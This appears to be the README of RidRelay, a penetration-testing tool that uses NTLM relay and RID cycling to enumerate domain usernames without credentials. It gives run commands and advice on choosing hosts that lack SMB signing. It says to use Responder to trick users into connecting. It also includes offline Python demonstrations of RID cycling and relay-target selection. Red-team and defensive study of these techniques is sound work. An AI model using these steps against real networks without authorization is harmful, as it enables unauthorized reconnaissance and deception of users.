Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
Quick and easy way to get domain usernames while on an internal network.
Hit me up: @skorov8
RidRelay combines the NTLM relay attack, common lsarpc-based queries and RID cycling to get a list of domain usernames without needing any credentials of your own. It takes these steps:
(For best results, use with Responder)
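The RID-cycling step, shown offline as an added example (this is not RidRelay's own code). The real tool resolves SIDs over the relayed SMB session's lsarpc pipe with impacket's LSA RPC calls (lsat.hLsarLookupSids); here the resolver is a constructed in-memory directory with a hypothetical domain SID and accounts, so the batching and filtering logic runs with no target at all.

```python
"""Offline demonstration of RID cycling: build domain_sid-RID for every RID in a
range, translate them in batches, keep only the ones that resolve to users.
Added example; the in-memory directory below is constructed, not real data."""

import re
from typing import Callable, Dict, Iterable, Iterator, List, Tuple

# SID_NAME_USE values from MS-LSAT; only the ones this example needs.
SID_TYPE_USER = 1
SID_TYPE_GROUP = 2
SID_TYPE_UNKNOWN = 8   # LookupSids reports this for RIDs that do not exist

# A domain SID always has the form S-1-5-21-<a>-<b>-<c>.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")

# Constructed sample domain (hypothetical SID and accounts).
DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"
FAKE_DIRECTORY: Dict[int, Tuple[str, int]] = {
    500: ("Administrator", SID_TYPE_USER),
    501: ("Guest", SID_TYPE_USER),
    502: ("krbtgt", SID_TYPE_USER),
    512: ("Domain Admins", SID_TYPE_GROUP),
    513: ("Domain Users", SID_TYPE_GROUP),
    1000: ("DC01$", SID_TYPE_USER),      # machine accounts resolve as users too
    1104: ("jsmith", SID_TYPE_USER),
    1105: ("svc_backup", SID_TYPE_USER),
}

# A resolver takes a list of SID strings and returns (name, sid_type) per SID,
# which is the shape of an LsarLookupSids reply.
Resolver = Callable[[List[str]], List[Tuple[str, int]]]


def fake_lookup_sids(sids: List[str]) -> List[Tuple[str, int]]:
    """Stand-in for LsarLookupSids against the constructed directory."""
    out = []
    for sid in sids:
        rid = int(sid.rsplit("-", 1)[1])
        out.append(FAKE_DIRECTORY.get(rid, ("", SID_TYPE_UNKNOWN)))
    return out


def batched(items: Iterable[int], size: int) -> Iterator[List[int]]:
    """Yield successive chunks of at most `size` items."""
    chunk: List[int] = []
    for item in items:
        chunk.append(item)
        if len(chunk) == size:
            yield chunk
            chunk = []
    if chunk:
        yield chunk


def cycle_rids(domain_sid: str, resolver: Resolver, max_rid: int = 50000,
               batch_size: int = 1000, include_machines: bool = False) -> List[str]:
    """Enumerate usernames by resolving domain_sid-RID for RIDs 500..max_rid.

    Batching is the point: the RPC accepts an array of SIDs, so sending chunks
    of 1000 keeps the number of round trips over the relayed session small
    instead of one call per RID. Groups and unknown RIDs are dropped; machine
    accounts (names ending in '$') are dropped unless include_machines is set.
    """
    if not DOMAIN_SID_RE.match(domain_sid):
        raise ValueError(f"not a domain SID: {domain_sid}")
    users: List[str] = []
    for rids in batched(range(500, max_rid + 1), batch_size):
        sids = [f"{domain_sid}-{rid}" for rid in rids]
        for name, sid_type in resolver(sids):
            if sid_type != SID_TYPE_USER or not name:
                continue
            if name.endswith("$") and not include_machines:
                continue
            users.append(name)
    return users


if __name__ == "__main__":
    for user in cycle_rids(DOMAIN_SID, fake_lookup_sids, max_rid=2000):
        print(user)
```

Against a real target the resolver would be a closure around the relayed DCE/RPC binding to lsarpc, and the domain SID would first be read from the target with LsarQueryInformationPolicy2 (PolicyPrimaryDomainInformation), which is what impacket's lookupsid.py does.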
pipenv install
pipenv shell
# Optional: only needed to install the bundled impacket submodule
git submodule update --init --recursive
cd submodules/impacket
pip install .
cd ../..
First, find a target host to relay to. The target must be a member of the domain and must NOT require SMB signing: a relayed session cannot sign, so a host that enforces signing will reject it. Domain controllers require signing by default, so they are not suitable targets. CrackMapExec reports this for every host it scans: crackmapexec smb 10.0.0.0/24 prints (signing:False) for usable hosts, and the --gen-relay-list targets.txt option writes just those hosts to a file.
Start RidRelay pointing to the target:
python ridrelay.py -t 10.0.0.50
Or, to also write the usernames to a file:
python ridrelay.py -t 10.0.0.50 -o path_to_output.txt
Highly recommended: start Responder to trick users into connecting to RidRelay. Responder must not answer the poisoned SMB connections itself: set SMB = Off (and HTTP = Off) in Responder.conf so the victims reach RidRelay's SMB listener rather than Responder's.
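A small target-selection check, added here as an example (not RidRelay's code): it parses CrackMapExec SMB scan output and keeps only domain-joined hosts that do not require signing. The lines below are constructed to mimic crackmapexec smb output; the exact column layout may differ between CME versions, so treat the regex as an assumption to adjust rather than a fixed format.

```python
"""Pick NTLM relay targets out of CrackMapExec SMB scan output.
Added example with constructed sample lines, not part of RidRelay."""

import re
from typing import Iterable, List, NamedTuple, Optional

# Assumed layout of one 'crackmapexec smb <range>' line; adjust if your version differs.
CME_LINE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+"
    r"(?P<os>.*?)\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)"
)

# Constructed sample output (hypothetical hosts).
SAMPLE_OUTPUT = """\
SMB         10.0.0.50       445    FS01             [*] Windows Server 2016 Standard 14393 x64 (name:FS01) (domain:CORP) (signing:False) (SMBv1:True)
SMB         10.0.0.10       445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:CORP) (signing:True) (SMBv1:False)
SMB         10.0.0.77       445    KIOSK            [*] Windows 10 Pro 19041 x64 (name:KIOSK) (domain:KIOSK) (signing:False) (SMBv1:False)
SMB         10.0.0.80       445    WS12             [*] Windows 10 Enterprise 19041 x64 (name:WS12) (domain:CORP) (signing:False) (SMBv1:False)
"""


class Host(NamedTuple):
    ip: str
    name: str
    domain: str
    signing: bool


def parse_cme_line(line: str) -> Optional[Host]:
    """Return a Host for a recognised scan line, None for anything else."""
    m = CME_LINE.match(line)
    if not m:
        return None
    return Host(m["ip"], m["name"], m["domain"], m["signing"] == "True")


def relay_targets(lines: Iterable[str], domain: str) -> List[Host]:
    """Hosts that are joined to `domain` and do not require SMB signing.

    Signing:True hosts (domain controllers by default) would reject the
    relayed session; hosts reporting a different domain are not members of
    the domain we want usernames for, so relaying to them is pointless.
    """
    wanted = domain.upper()
    targets = []
    for line in lines:
        host = parse_cme_line(line)
        if host is None:
            continue
        if host.signing or host.domain.upper() != wanted:
            continue
        targets.append(host)
    return targets


if __name__ == "__main__":
    for host in relay_targets(SAMPLE_OUTPUT.splitlines(), "CORP"):
        print(f"python ridrelay.py -t {host.ip}   # {host.name}")
```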
Mad props go to: